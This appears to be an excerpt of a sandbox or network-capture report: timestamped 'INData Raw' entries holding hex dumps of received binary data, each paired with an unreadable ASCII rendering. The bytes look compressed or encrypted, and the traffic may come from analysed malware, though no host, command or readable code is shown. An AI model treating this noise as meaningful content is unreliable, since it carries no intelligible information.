30 00 45 68 a0 7a f8 c5 c4 24 48 b0 a9 c2 25 eb e0 f8 60 58 5b 3c 26 00 1c 07 39 01 6c 7a 08 02 9d 7b 66 5f 31 7e de 4a a9 24 51 42 cb ee 7f cd f0 01 0c 6c 85 39 4e 00 e9 d8 07 64 97 bd 84 ba 2a
                                                                                                                                                                                Data Ascii: 3(se|UDE\| wfu'5S|8xA2NK V1v-Rd6p`A<e_D.<6]K.KPG(UqRJ[uS91l&W[vRnB~3(f;1o0Ehz$H%`X[<&9lz{f_1~J$QBl9Nd*
                                                                                                                                                                                2021-11-11 11:26:04 UTC1855INData Raw: bb 2c 11 55 bd 90 4f fb 06 42 34 97 a8 de b8 68 0c b8 f6 90 11 51 56 f2 2c 13 6c 5b 3a b6 68 4b c4 e4 00 04 68 38 d5 56 21 b5 ef f8 ad df 17 1c 25 77 9f 66 a5 f4 a0 da 75 7c c4 e9 dd 6c ea 82 93 74 36 72 d4 2a d2 ff 53 96 af 7d 16 97 2e a2 13 e7 27 e0 16 f5 fd ec 86 06 0c a8 90 51 07 18 4f 94 e1 d2 00 e9 17 1d 76 5a 9f 8c 46 21 1d 4e 82 e9 09 50 20 60 34 f3 0e 4b e6 81 0e e1 e7 6a f4 2e ec 67 38 08 96 bb 76 7e 60 97 e7 dd 30 09 16 28 ca 65 83 5a 1a 53 01 4c b4 12 23 19 3e f6 61 4a e1 6a 00 ca 1c 5a 16 f7 cf a3 af 4b 0a 08 fa 84 97 80 40 43 92 d1 a0 c9 30 ed d8 2a 20 51 06 04 a7 fe cb 93 9c ed 28 8f e2 48 4e 82 32 54 16 03 10 71 94 44 97 50 d6 19 a8 15 c4 5a 84 00 d5 3c c9 0e eb be 0c 41 e5 5d 4e 2a 98 2c 9a a3 bf 8f d4 dd fe a6 3a 00 c7 4d de 8b b6 0e 88
                                                                                                                                                                                Data Ascii: ,UOB4hQV,l[:hKh8V!%wfu|lt6r*S}.'QOvZF!NP `4Kj.g8v~`0(eZSL#>aJjZK@C0* Q(HN2TqDPZ<A]N*,:M
                                                                                                                                                                                2021-11-11 11:26:04 UTC1871INData Raw: b2 ac dd 05 e0 3b 2f 69 c3 e5 c4 39 c0 6b 4e a0 1c ea ed c5 35 00 a5 04 d7 c2 77 4e 1b 88 a0 8c 1c 73 c0 28 81 a1 2b 71 e1 01 89 1e fa 43 a0 68 1a 6a fc fe 0f 7b 6e 9a d2 e4 85 9b 01 c3 0c 07 ae c4 a1 8b 7c 09 99 08 54 78 1f 0c 2d ef 42 16 2f c3 40 ec a5 14 10 78 e0 cf 78 06 71 c9 7d e7 58 c4 25 d8 e1 78 9e 05 b2 8d e2 9e fe ea 40 89 68 c6 a2 b7 3d 97 69 83 32 2a ad 1b a2 51 75 d4 9c 74 90 d8 39 55 bd 2f 35 fe ce 67 5d bd 1f 30 21 7e 15 71 df 16 33 5a e6 08 03 53 68 76 69 6d f4 bb 8e 2c 4b ae 7a cc 4e b2 8e 92 ed da a4 bc 69 f4 ab b2 5d 92 a8 cd a4 af e6 6e d6 fa ce d8 d3 38 a8 e9 17 69 d8 ea af d2 7e 8a 54 ad 16 0d e0 fc 3d b8 a6 9c 38 16 59 a0 e7 ae 4a bd 80 37 a9 9f 2a 2d d7 76 75 91 4f 54 6b 00 c5 c0 c4 fb d3 3c 05 16 bc 7d 2e 5c e9 ff 02 58 55 11 3d
                                                                                                                                                                                Data Ascii: ;/i9kN5wNs(+qChj{n|Tx-B/@xxq}X%x@h=i2*Qut9U/5g]0!~q3ZShvim,KzNi]n8i~T=8YJ7*-vuOTk<}.\XU=
                                                                                                                                                                                2021-11-11 11:26:04 UTC1887INData Raw: 96 57 2d 58 56 d9 77 82 1a 31 3c 4d 5f 53 64 ad 5b 5a 6b 5d 4d 90 a5 d3 56 e0 49 42 bb 3b 09 4f c1 ef 08 dd 43 18 f8 8b 6e 4a ec cf e2 da f8 7d 90 48 28 25 20 e8 00 05 ea 74 ab 7f 01 f8 2d a2 07 dd 95 eb 2f d9 8a da d7 51 44 d0 5f 30 1f 7f 6f 2d 47 05 37 76 50 c9 33 df 6e f4 51 03 67 fb 7b 0d e6 a1 03 92 c1 e8 08 35 ab bb 7e 4f 7a ae 8f 62 5e e3 a4 d7 fc 16 e8 e9 02 72 79 ea ff 8c 47 dd 89 3c 77 13 0a ea a6 04 a0 bb 04 38 d5 39 82 82 6a 74 80 04 5d ca 34 e0 da ad 4a a7 45 50 91 e5 bb 31 82 81 57 41 0e f0 a6 2e ed e2 84 80 b5 3a 09 5a a8 4e 75 fb 10 a7 e4 0a 4f 39 ef 61 56 1a 4d 29 96 27 ce c0 4c 91 6d 03 3e 03 8d 6e 1c 4c 00 80 65 52 9a 17 85 de 0a 7c f5 1e 3d 35 f3 c6 a0 b5 3b 38 9d 54 3a c4 24 b8 ea 00 11 7a 85 ad 77 1e c5 11 0a d6 51 82 ec 16 5b 21 58
                                                                                                                                                                                Data Ascii: W-XVw1<M_Sd[Zk]MVIB;OCnJ}H(% t-/QD_0o-G7vP3nQg{5~Ozb^ryG<w89jt]4JEP1WA.:ZNuO9aVM)'Lm>nLeR|=5;8T:$zwQ[!X
                                                                                                                                                                                2021-11-11 11:26:04 UTC1903INData Raw: 78 c8 5f fe 2f 73 4b 90 63 15 bc 5f 69 75 50 d9 ce c3 e9 b3 75 9b 16 a9 9f 02 f8 bc 84 cd 3a 81 da 22 13 83 2c de 3f d0 03 8f 07 e3 f9 82 32 f1 37 40 c4 63 6f 9d 18 d8 3c 75 5a 02 67 c8 29 d6 f4 ec 11 95 25 dd 43 d6 56 73 09 3c 60 0d 4a 7d 66 20 18 13 48 02 25 6b ef c0 0c 01 e2 2f d5 28 19 63 39 56 2c 62 eb e7 01 1e db 9c d8 08 30 4c 27 2a c0 fe 2c 18 79 87 64 67 7c 26 d0 90 12 09 17 00 19 c7 c9 6b e9 55 ec 89 9b 98 88 7f 92 43 0a c2 12 68 b6 6b d1 f0 7b e6 01 73 fa 65 ef 7a 06 d8 3c 16 84 0c dd 48 ff ee 50 8f 96 30 08 42 f9 0c db 77 48 f4 6b 02 90 dd a0 10 40 df 68 21 79 1a c9 f4 6f 60 04 23 08 c0 30 e5 ce 7b 35 c3 03 9c b2 55 b3 3d 0f db 1c 81 65 1b 80 34 79 ef a5 06 04 46 12 ba a6 a2 ea 48 59 c5 3d 80 16 1f 5d cf 5b 0e 8d ac 98 7c ce 08 ca 6b 94 a0 0c
                                                                                                                                                                                Data Ascii: x_/sKc_iuPu:",?27@co<uZg)%CVs<`J}f H%k/(c9V,b0L'*,ydg|&kUChk{sez<HP0BwHk@h!yo`#0{5U=e4yFHY=][|k
                                                                                                                                                                                2021-11-11 11:26:04 UTC1919INData Raw: 16 2e f7 ee 3e e8 68 0d 26 a2 79 3d e9 3a e7 9a 80 b9 fa a8 d9 58 95 ee 64 be 4d 58 f3 fe 88 c7 8c c0 0c 9c 68 56 4b 28 31 33 89 64 50 b8 3b f8 ab 5e ba 79 b5 7c 14 b2 52 75 dc 87 61 31 62 33 c2 65 d7 ad fc 66 c4 e3 cb f7 01 68 8d f2 be 7f 5a 2f b0 81 ea 0b 6e 0d 41 80 7f 09 73 df 96 41 60 52 cb 57 68 97 38 25 0b 15 5d 3c af 9f 74 ea d6 25 51 54 45 15 2f b4 44 9d d7 97 03 a7 75 14 ea 48 34 5b a9 7f e8 11 b5 61 01 c7 7c 7f f0 58 b5 16 49 0b 1c 67 9b c1 95 dc 06 c7 0f 16 9b 4d f9 51 c5 b3 cf ac 8e 06 87 e8 c1 1b 16 45 ae 6b 71 89 ef 37 83 5a b1 c0 51 3a 16 24 04 0e c2 34 3e 60 92 0a c7 4b 4a 28 04 a7 4e 28 8c 4f da 42 d4 5a 12 56 ea f2 e7 df 21 8f 5e db 56 eb 61 b1 32 a1 79 86 03 65 ec b2 94 fd a8 eb 74 64 31 38 1e 7a 40 b6 51 9c 53 98 39 20 1f af c6 0c 7f
                                                                                                                                                                                Data Ascii: .>h&y=:XdMXhVK(13dP;^y|Rua1b3efhZ/nAsA`RWh8%]<t%QTE/DuH4[a|XIgMQEkq7ZQ:$4>`KJ(N(OBZV!^Va2yetd18z@QS9
                                                                                                                                                                                2021-11-11 11:26:04 UTC1935INData Raw: d5 0b 61 ff b4 95 97 71 82 e5 57 e3 e2 cb 50 55 9d d2 27 fa 63 04 68 c9 47 01 49 ef d8 21 e7 00 0f bf 7b 4a 81 c2 b8 48 3b bb 3f 04 ca 87 89 cd ff b0 ac f2 31 65 26 e1 d6 5a 7d 53 cb a9 fc a2 41 a1 7c 1d 02 38 9a 62 dd 71 8f 05 f1 cc 5d f9 2b f3 0c fc ef ec b5 ad 91 86 bd 75 4f 88 c5 07 88 78 6e 60 34 10 f9 16 2c 36 03 c8 25 55 94 bc a4 e2 69 76 4f 62 af 24 40 24 22 a8 99 cc 17 d1 aa 04 11 1a 9c bb 09 d7 71 f1 6f ad 0b 48 70 90 27 95 68 dc 17 63 9a 2a 4a 7c ff 69 68 fa 2e 0e f4 d3 ea 39 50 84 3c 6b 39 5b eb d8 e2 b5 70 f4 a8 2c c3 d8 9f f2 79 c1 28 a0 a3 6b 58 2a 91 f3 bf 60 8c 3c 24 bc 98 ba 2c cb eb 78 e1 49 57 43 12 ab 56 2a 1d 69 6d 25 d6 79 e6 6c 1f 38 8b b2 b1 d2 69 94 9a 3f 05 6b de 19 fe dc b2 9d 01 b5 34 ef 77 85 45 e8 ba 28 0b 05 50 b9 dd 99 b2
                                                                                                                                                                                Data Ascii: aqWPU'chGI!{JH;?1e&Z}SA|8bq]+uOxn`4,6%UivOb$@$"qoHp'hc*J|ih.9P<k9[p,y(kX*`<$,xIWCV*im%yl8i?k4wE(P
                                                                                                                                                                                2021-11-11 11:26:04 UTC1951INData Raw: 94 5a 60 80 e4 61 77 62 be 2b 0c 83 b7 1c 45 60 be 78 4b 46 2a 35 75 1a 09 9a dd bb 84 e6 2a 21 7f 76 25 55 cf c9 34 a2 ec fb b1 9f df 09 9a 20 72 54 55 7b 4f 82 7b dc 85 22 dd 68 b1 f7 54 4f 38 84 dd 00 bc c7 88 78 5a 32 d2 15 ab c8 2d d8 27 23 7f 7d ca 63 f7 79 3d 1f ef b0 70 79 b0 ad 67 36 88 14 a0 72 9b 5d f8 2c 63 73 84 42 66 16 00 1c 18 c2 2b c3 2c 61 d1 17 f8 b9 a1 92 2c 31 73 16 00 2a 7c 44 b5 37 1d 03 71 5a 02 07 25 18 bd 62 a0 70 d7 42 2d 71 ca ee 51 62 2c 22 37 91 1e 63 0d 0a be 80 71 28 5b 5e 09 01 65 db 14 ca e2 8c b7 62 d4 09 6f ea 97 18 56 52 cd 09 c3 7f ae 34 df d1 7b 4c 0c a3 95 00 8e c6 53 48 c2 91 a6 16 d2 e2 e0 1c b0 67 20 50 a7 4e 83 f5 80 1c 8d c9 bd 8f 8e a8 5a 8b 22 6e b7 7c 74 03 29 32 27 88 bd ba 91 ca 09 41 3c 61 8f 1f a6 26 cc
                                                                                                                                                                                Data Ascii: Z`awb+E`xKF*5u*!v%U4 rTU{O{"hTO8xZ2-'#}cy=pyg6r],csBf+,a,1s*|D7qZ%bpB-qQb,"7cq([^eboVR4{LSHg PNZ"n|t)2'A<a&
                                                                                                                                                                                2021-11-11 11:26:04 UTC1967INData Raw: 3d 92 18 9b 21 30 ab e1 00 06 dd c2 5a 34 11 23 47 07 cd a5 4c 9c a1 6b f0 c8 00 ce f2 ff 4a 2c b2 69 07 4a 3a af 89 d0 40 9a 2f 02 bd 1e 5f 01 e9 39 51 08 3e b9 58 27 53 dd 15 f7 ba 4a ab 9b 91 4a aa ce 7f 92 ea dd 6a 6e ed bd a2 92 5d e4 31 d4 15 df 09 ca 03 3a f7 e7 2d 41 59 e9 b7 ad 15 da 3c 09 3a 4b 81 1e f5 45 53 a7 df 12 5f 75 9d 34 89 51 55 80 1a 10 9d 6b 3a 16 89 f5 5e aa d8 97 5b 97 b2 52 39 41 e9 f7 02 fd 68 8c d1 08 03 d7 51 11 52 fd 96 1a bf e2 99 75 59 ef eb 5c a8 52 55 7c 4f 69 e4 37 bd f8 41 0d 3e 58 35 eb 0d 3c 2d b4 c3 a2 fe 48 be 84 17 49 fc 31 be 1b 58 2b f7 e9 18 47 56 2e 1e de f9 3b ff 34 1a 04 1c 67 5b a4 34 f6 49 a4 c0 85 be d9 67 1c 6b 57 4e d6 50 ee a2 4c 9f 51 6f a8 dc 4a 83 a0 74 3b 50 fd 1a bc 7e 1d 97 30 49 26 52 21 95 a6 04
                                                                                                                                                                                Data Ascii: =!0Z4#GLkJ,iJ:@/_9Q>X'SJJjn]1:-AY<:KES_u4QUk:^[R9AhQRuY\RU|Oi7A>X5<-HI1X+GV.;4g[4IgkWNPLQoJt;P~0I&R!
                                                                                                                                                                                2021-11-11 11:26:04 UTC1983INData Raw: 51 0f 64 6e 4f 20 07 ee 64 02 0c 49 c4 bd 00 c1 8e c7 be 46 0c b0 f5 6b 49 20 d7 6e a6 88 6b ed ff c4 3a cd 4c d3 06 c0 34 8f 03 fc e6 1d 86 fe 30 18 30 a4 78 cc 1a c5 9a fc 3d ce 6b e5 9c 5b 91 18 2c fd 80 08 0c 6c 2b 6a 73 4e 04 94 b9 e4 83 cc c2 3a ae f5 d1 ef 0c 53 5b 40 cd 03 28 52 b8 90 5a 01 0e a9 46 d1 0a 0b 6f 26 c6 99 e1 5a 0f 84 f9 ab e6 19 08 52 d4 97 89 0a 15 01 ab 94 29 5b 6e fc a2 c0 92 b2 b5 4e 7e 01 26 4f 45 ca 28 69 0e d4 2d e5 59 f7 32 4d 20 d3 21 30 17 c9 e2 75 cc d0 5f fe e1 42 6b b7 ad 35 f1 19 a8 b7 ac 86 0c fd 7b 92 ef 22 a9 60 e1 3a 8d 6d 7d 26 30 93 79 e2 f1 a0 22 c6 22 ce 1d e0 01 34 9b 88 38 82 40 8b 3e eb 30 86 dd 02 41 06 48 a2 6c 81 ef 14 ec 93 17 ec d7 82 e1 eb d4 26 43 b3 b2 90 4a c7 f6 01 8a 60 b0 20 45 3d ff b5 d9 c2 43
                                                                                                                                                                                Data Ascii: QdnO dIFkI nk:L400x=k[,l+jsN:S[@(RZFo&ZR)[nN~&OE(i-Y2M !0u_Bk5{"`:m}&0y""48@>0AHl&CJ` E=C
                                                                                                                                                                                2021-11-11 11:26:04 UTC1999INData Raw: 43 4a b9 88 6a 96 44 97 42 70 a3 9e b8 40 07 01 32 c3 05 a4 88 0b 2a 5b 90 94 9c b3 a0 04 34 36 57 f5 22 c8 65 5a 3a 66 08 b4 ae d1 0f fe 1a b6 43 88 5c 9f 30 09 b0 e2 5e 8b 44 2e 12 df 04 4e 30 60 bb 2d c8 ee ea 69 d0 3c 68 52 57 e8 97 f1 31 8a f3 de 08 42 d8 76 90 ee e2 3d 4a 5d f8 37 48 e1 41 c5 21 a4 bd 1c 14 68 98 b8 2e 26 22 42 7c 53 00 38 9c af 9b c0 14 17 e6 c9 4f b0 12 da 7e 07 b3 5a 2d 8e 62 50 7e 48 ec c4 f5 02 0d 24 06 d4 d3 d7 e8 b0 68 b6 80 f8 c0 00 b9 5e 04 3f b8 0e 31 34 2c 0d d6 3c 94 dd 9c 18 19 a9 4c 96 a2 b1 22 08 4c bd 40 b8 b9 eb 1c 4d b4 e6 18 68 3e b0 ed d9 c0 40 66 77 a6 54 6d 61 8c 30 7d 56 1d 8c a2 3d e1 86 24 04 a4 0c e2 6b 46 ef b8 c5 85 ca 5e 8c 55 11 10 ff 72 5a 01 58 3e ad 1b 68 02 3b ef 38 7e f0 40 20 92 70 84 88 ce ec 94
                                                                                                                                                                                Data Ascii: CJjDBp@2*[46W"eZ:fC\0^D.N0`-i<hRW1Bv=J]7HA!h.&"B|S8O~Z-bP~H$h^?14,<L"L@Mh>@fwTma0}V=$kF^UrZX>h;8~@ p
                                                                                                                                                                                2021-11-11 11:26:04 UTC2015INData Raw: 49 82 10 f4 5a 3e 5e 40 d8 b7 5f c5 14 f1 99 04 2e 79 a6 ae fc 86 a1 f8 9d 8a 8c 68 3d 3c 0b e0 b3 55 6c 08 25 3a ed 68 db 4e 18 28 ef b5 4c 4b e0 ea 46 f6 74 97 48 30 a1 4a 30 68 e8 b9 3d 19 51 db ad ed b1 fa 10 0a 1c 57 2a 2f 7c b1 51 4f 2e 12 2d ea e2 f7 a0 6b 45 f4 02 f8 5e 18 22 fc 93 fc a6 12 b6 c2 70 4a 7e 6d 12 50 13 64 e0 9f 89 40 b8 58 1d a3 d2 17 c1 ad d1 2c e7 4d 8c 90 60 12 70 ff 61 f7 08 58 a4 fa 74 aa 1d 62 55 98 80 fe 84 80 bb ec b5 18 2e 06 54 3a 1e 12 e3 1d 42 e0 93 0b eb 81 54 e7 90 8e 1f 3a f0 d3 87 bd 20 30 ae 74 d8 46 31 7e b4 a8 bb 40 80 1c 85 a5 e1 9e 6b 51 03 42 e6 56 e3 58 9b f8 16 5e e2 09 32 49 98 ba f9 78 0c 02 bf 3a 99 6c 65 17 98 c0 40 ea 63 3e 7f 25 80 d0 15 6f d7 90 ee 29 bd f0 85 5a 27 22 29 07 a2 0a d7 a2 44 5c 30 60 74
                                                                                                                                                                                Data Ascii: IZ>^@_.yh=<Ul%:hN(LKFtH0J0h=QW*/|QO.-kE^"pJ~mPd@X,M`paXtbU.T:BT: 0tF1~@kQBVX^2Ix:le@c>%o)Z'")D\0`t
                                                                                                                                                                                2021-11-11 11:26:04 UTC2031INData Raw: 0f 5b b1 38 8e 86 2c 03 c7 1d 29 44 cb da 07 ae fa 0d 96 d6 90 c6 53 2a 43 95 02 4a 52 38 03 1d 3e 06 82 b3 cb a1 10 34 31 2c ac 76 8e be 82 1c a3 87 a8 ca 77 59 b4 2c 4e 25 7f c4 e1 20 aa 38 80 65 b6 04 27 07 6b 2c 20 6c bb 60 9c 10 e5 fc 6a a7 0c ed 5e a8 fd 74 58 91 9b 9c d7 56 97 c6 18 f6 02 f6 26 0e ca 09 a3 d5 f3 4e 25 96 df 13 a1 1b f4 b8 4e a5 ee 8f ac 42 1e 12 ec 9b ec ae 4b d9 a8 0a eb 08 3c 14 4e 9c 52 44 92 dd ff 42 e3 16 43 20 ea f3 f5 48 0c 38 a5 63 1f 5c a2 07 e1 d9 3a 65 76 3b d8 52 00 39 50 8a 8d 86 09 2f 1b 53 8c 38 14 98 12 2a 75 62 e0 48 3c ed 82 6a dc e6 4a 31 49 21 0f 38 0e 18 83 b3 08 fe 8d 31 b1 64 6c af df be f4 30 86 08 73 7f bd 1c 6a 2e 0c 45 06 92 18 c0 56 49 b0 62 06 aa 34 45 b7 58 14 f0 5f 28 fa e3 9e f8 e2 c0 f4 d7 17 cf 2b
                                                                                                                                                                                Data Ascii: [8,)DS*CJR8>41,vwY,N% 8e'k, l`j^tXV&N%NBK<NRDBC H8c\:ev;R9P/S8*ubH<jJ1I!81dl0sj.EVIb4EX_(+
                                                                                                                                                                                2021-11-11 11:26:04 UTC2047INData Raw: 89 9d e7 6e c0 68 b1 92 37 5d 1d af f4 a4 32 45 12 c2 ff 16 db f7 25 60 77 47 31 35 a0 a2 93 f4 ab b2 2e e5 ae 3f 1e 1b e9 61 a1 ab c0 84 e4 37 e6 b7 f0 ae 02 db 98 33 c4 74 e2 e0 b9 56 8d d4 18 b3 01 8c d9 c5 8b 0f fc 20 d5 93 b7 00 cf 25 74 66 a6 01 1b 62 ce 42 63 bc 4d 39 18 27 c0 02 14 eb b5 fe 27 00 d9 0a 34 f9 ca 2c 3c 6a ed 2d 32 a0 49 e4 2f 43 1b fc 45 00 4e 9c f7 e8 19 fd fe 6e 4f e0 e0 56 ef 66 0b 5e 7d 24 e0 7f 31 6c de 1d d3 2f 8c 14 4b 0d 54 37 9d 54 f1 89 4a f0 7a 40 27 0a a3 75 44 3f 33 7d ab 08 da 58 ee 92 28 18 1c 33 6f 7c e9 26 16 24 e2 1c f4 13 b7 7a 3d 82 f7 01 a2 14 3a 0e ec 29 70 00 28 79 32 e2 f8 3d ec 08 d8 4c 74 ab 9d 4a 02 21 71 fe e4 a0 a1 aa 60 39 dc 28 b1 6a 30 17 a3 41 e6 b1 e2 6a 44 a9 48 3b c3 47 c0 06 19 bc 41 11 6a 54 5b
                                                                                                                                                                                Data Ascii: nh7]2E%`wG15.?a73tV %tfbBcM9''4,<j-2I/CENnOVf^}$1l/KT7TJz@'uD?3}X(3o|&$z=:)p(y2=LtJ!q`9(j0AjDH;GAjT[
                                                                                                                                                                                2021-11-11 11:26:04 UTC2063INData Raw: 66 d9 03 04 cc 20 12 60 59 ed b2 f2 00 10 36 14 0a 11 61 ba 4e 99 b3 9c 00 85 2e 21 da ac 72 6c 92 92 07 53 e7 1e a1 61 30 75 20 94 d6 1e 8e 77 0c 40 55 d0 b9 4f e6 6e 31 90 1f d0 66 af 88 90 bc 5a 09 77 b4 10 c0 78 a5 cb 08 0f 20 4f fb 06 cc b9 02 7a a4 98 77 e7 ec 5c fa d8 24 45 85 09 9a 0f d4 70 d8 30 bd 8c 21 6b 0f c0 e2 06 95 c0 01 45 a3 20 83 a8 9f 6f d4 f3 7b 16 df ca bc 70 b7 12 d2 43 b4 fa c2 0f 2f 89 36 dd 61 f1 1e 6a 80 a0 aa dd 43 97 d5 19 86 d2 6a 82 9c 8b d5 c4 36 e5 33 e9 00 71 0f 16 4e 54 13 76 60 bb 48 31 23 da 72 7d 7d 0a 04 89 20 4c a6 01 8d 8c ed 4e 93 f0 55 94 95 5c 3c d0 03 a9 9f 53 b7 89 e0 68 77 16 f0 80 1a 48 a1 ac a4 6b d3 30 7c a8 50 0a be ac 94 3f 33 99 44 68 9a ad 28 8f 51 2c 3f 07 60 62 41 e2 d8 77 98 93 9d b0 fd 9f 61 40 49
                                                                                                                                                                                Data Ascii: f `Y6aN.!rlSa0u w@UOn1fZwx Ozw\$Ep0!kE o{pC/6ajCj63qNTv`H1#r}} LNU\<ShwHk0|P?3Dh(Q,?`bAwa@I
                                                                                                                                                                                2021-11-11 11:26:04 UTC2079INData Raw: 04 08 a6 52 c7 79 ed f5 27 6b 78 2e fa 47 16 38 7b 59 ba 46 e7 33 09 74 00 16 91 fa af aa ce 17 d9 d3 14 05 39 7b c8 04 b2 ad 15 a3 72 01 13 3c 8c 9e 73 c0 88 48 b7 d8 01 22 c2 ea 1f 5e 3a 04 b3 77 d2 90 a9 aa c8 9a 28 10 1c 82 59 7a 62 00 e9 b1 47 15 31 f6 d5 3e 87 41 00 f2 06 5f 89 cd 5d 22 bd d9 c1 04 23 1d 4e ea a7 f1 1c 35 ee 22 11 c4 54 4a 61 2c 4b e9 01 82 18 1e 9f 18 26 f7 03 29 fd c2 1d 80 eb 90 45 3a e5 7b 88 36 11 4b 08 cd 56 88 14 37 a9 00 16 b5 f0 f3 82 92 1c e1 a3 3b a8 50 11 98 5b 43 10 38 a7 02 b2 51 d8 b3 01 24 f6 30 48 8d c5 06 96 6d 85 5e fd 90 01 1d e3 89 10 c4 70 45 7b 00 4f 43 fc bd 38 d5 18 32 f7 dc 6c 30 b3 44 27 2b 40 20 23 12 25 9e f5 21 fe 7b 48 22 b6 24 70 c4 e2 6a 16 10 19 41 c9 18 d5 dd cb 0f fc 41 ae 9c 65 39 96 20 2a b0 8a
                                                                                                                                                                                Data Ascii: Ry'kx.G8{YF3t9{r<sH"^:w(YzbG1>A_]"#N5"TJa,K&)E:{6KV7;P[C8Q$0Hm^pE{OC82l0D'+@ #%!{H"$pjAAe9 *
                                                                                                                                                                                2021-11-11 11:26:04 UTC2095INData Raw: 9a 01 0e c3 a7 01 01 c6 06 48 31 1c b7 20 82 30 2b a3 4f 69 70 02 3f b6 1b 14 c5 30 01 77 e1 00 3f 05 c2 34 76 d7 e0 46 f8 99 98 dd a8 f3 f6 55 07 0e 02 54 eb f0 51 49 ef d4 9e 50 a7 31 78 3e 3c 97 58 b9 18 f9 41 e1 9e 09 ca 72 a3 6e df 44 26 f9 21 65 c0 0b 01 01 5c d1 d6 e7 f5 c5 f6 51 e4 77 0c f0 51 6a 0c dc c9 cf d5 31 e0 17 d9 e2 8e 05 7d b6 d6 03 6c 96 dd 4a 2d dd 12 82 92 e6 52 76 d0 8c 38 e1 1c 7d 56 9f fc 08 dd e0 27 9f 4e 84 f4 a4 01 45 6e 63 fa 9c a0 e2 2d d7 97 b0 4e ed 52 25 ca f3 90 40 d2 43 95 10 a2 fe 4d 96 c4 bd 0c 4f 08 e7 58 80 50 79 36 39 97 53 60 02 5b ed 81 43 f2 fe 30 de d0 60 b1 95 18 40 25 52 01 71 2c 1b 5b 60 7e 7d 69 6a 17 94 84 e9 38 18 d1 61 58 7c 55 02 2e b8 f3 2d 57 54 ff 59 fe 42 c0 ee 31 0b 2e c2 1e 4a 5d ef 3c 31 30 fc ea
                                                                                                                                                                                Data Ascii: H1 0+Oip?0w?4vFUTQIP1x><XArnD&!e\QwQj1}lJ-Rv8}V'NEnc-NR%@CMOXPy69S`[C0`@%Rq,[`~}ij8aX|U.-WTYB1.J]<10
                                                                                                                                                                                2021-11-11 11:26:04 UTC2111INData Raw: 09 7a 71 85 20 c2 40 77 af 66 3e e4 f0 76 03 6c ea bb 6d 6e ac c1 2c 0d f9 11 7e a8 7c 87 ce a9 08 a0 dd 0e b9 43 33 9c 17 be 60 a8 16 ab 45 4f 15 fb 24 c1 98 d6 82 98 d7 4b ff ef 2a 9e 12 d4 23 be 75 c0 e3 ba 12 6a 3a f3 82 62 04 bc e8 64 5e 09 8c a0 01 70 7d 40 14 8f f3 38 61 46 44 3e f6 ea 66 77 44 23 19 16 3f 35 78 e0 ca a8 2d 5e 8b 90 e2 58 f6 31 04 f9 14 b3 7a 64 3a df c2 80 cc 2a 88 76 28 49 54 de 8c 71 48 40 17 c3 c5 f2 49 01 03 54 42 2f 2c 41 50 18 ac 78 e7 30 73 b8 03 1e dd 34 33 f6 c7 8a 9d 7d 56 60 d0 81 0c 85 07 80 97 ff 18 53 b4 ef b8 4e b2 41 77 62 c6 6a 30 f4 24 d3 f5 57 1a ba 17 58 98 44 72 27 61 fa 57 ee 0e 15 e6 5e fe fa b7 2a 50 84 8e 63 5c dc 66 55 7e 96 be 2c 50 c2 49 13 0c 57 6f a8 12 18 d9 42 60 7f 6d c6 54 25 8e 78 2c a4 e6 b2 42
                                                                                                                                                                                Data Ascii: zq @wf>vlmn,~|C3`EO$K*#uj:bd^p}@8aFD>fwD#?5x-^X1zd:*v(ITqH@ITB/,APx0s43}V`SNAwbj0$WXDr'aW^*Pc\fU~,PIWoB`mT%x,B
                                                                                                                                                                                2021-11-11 11:26:04 UTC2127INData Raw: df e7 7c a0 ac 24 5e 9f 5f 9f f8 0b 92 71 bc 38 23 ea 22 16 ae fc c0 4a ac 04 f1 e6 90 72 40 1a 20 e3 ae 77 e8 5c 14 6b c6 48 ee c3 f4 0b 98 b2 29 68 00 99 49 e9 dc 69 fa 92 05 d7 77 5d 11 f9 fb c4 bc af 74 9e be 9d 28 89 64 e3 91 49 6a 24 83 29 e9 c4 e2 3d 00 24 73 bd 35 c7 6f 8c 10 05 2b f0 87 03 0a ab 76 c4 40 0f 4f ea 89 3b b8 1d 66 2b a4 e6 00 7a 5e a5 57 f0 14 f3 e0 00 69 61 d9 bd 3e 8a 13 c3 94 3e 8c a1 cc 84 36 18 95 48 aa c0 fd b6 02 2b 0c dc a8 e8 02 83 58 52 67 06 6c 1c 0b 22 24 e0 00 6b e6 cc 7a 80 e3 32 64 04 0f 84 49 4c d5 81 d5 58 46 b0 32 16 63 d6 cb 80 28 5b 80 3d da 27 e8 2c 7c f1 84 61 44 16 b0 da 5f 05 c6 a7 c9 4f 7f c2 a8 4a a0 7c b0 f7 2a 05 17 8a ba fe ec a6 80 9e 9f 77 9d 0b fe ca 50 5e de 99 02 a3 43 18 85 95 c4 63 4e 80 62 c1 a6
                                                                                                                                                                                Data Ascii: |$^_q8#"Jr@ w\kH)hIiw]t(dIj$)=$s5o+v@O;f+z^Wia>>6H+XRgl"$kz2dILXF2c([=',|aD_OJ|*wP^CcNb
                                                                                                                                                                                2021-11-11 11:26:04 UTC2143INData Raw: 96 09 1e 05 43 74 f2 40 ed f2 e9 b1 a1 10 c0 3e 21 8c ea b3 8c 18 3b 1f 4c 79 97 00 9a fd ce 33 11 c6 78 4f 35 64 98 be cf 08 ee e0 6d be 87 bc 08 02 c7 51 34 02 54 49 75 71 b2 0c cd 74 5a ca 6c fd 17 90 f2 9e ce 00 25 f1 24 1e f4 f3 02 b4 15 e1 f8 ee 71 b2 ee 75 41 db 7a 48 dc 0b 16 1d c6 99 21 15 c7 34 2a 20 d8 b1 5c 38 3d f6 e1 5e 80 30 af 4f b3 09 71 89 b7 2c c0 5f e2 dd 01 2a f1 4d 25 8c de e4 b9 2a 19 6b cf f8 6f 3b 04 f4 09 a3 b9 f8 19 db a1 08 ba 7a 00 37 1e 91 6d c8 0e 4f ab d1 28 be 42 3b 31 24 9f a8 8c 70 47 04 18 35 24 2f 75 fe 96 20 80 1d 28 e8 1c 3d 04 e1 98 b1 3a 48 38 a8 12 de 5b a7 c0 6d 77 4a 91 2f 80 79 54 0b cf 04 72 5b 41 0a 6b d3 8f 48 8c 6f 22 7a 4a 31 9e 57 0c fc 62 93 88 71 f0 a2 bc 24 e7 3e 0a 8c 12 c2 4c 1a 60 de a0 a3 d7 41 e9
                                                                                                                                                                                Data Ascii: Ct@>!;Ly3xO5dmQ4TIuqtZl%$quAzH!4* \8=^0Oq,_*M%*ko;z7mO(B;1$pG5$/u (=:H8[mwJ/yTr[AkHo"zJ1Wbq$>L`A
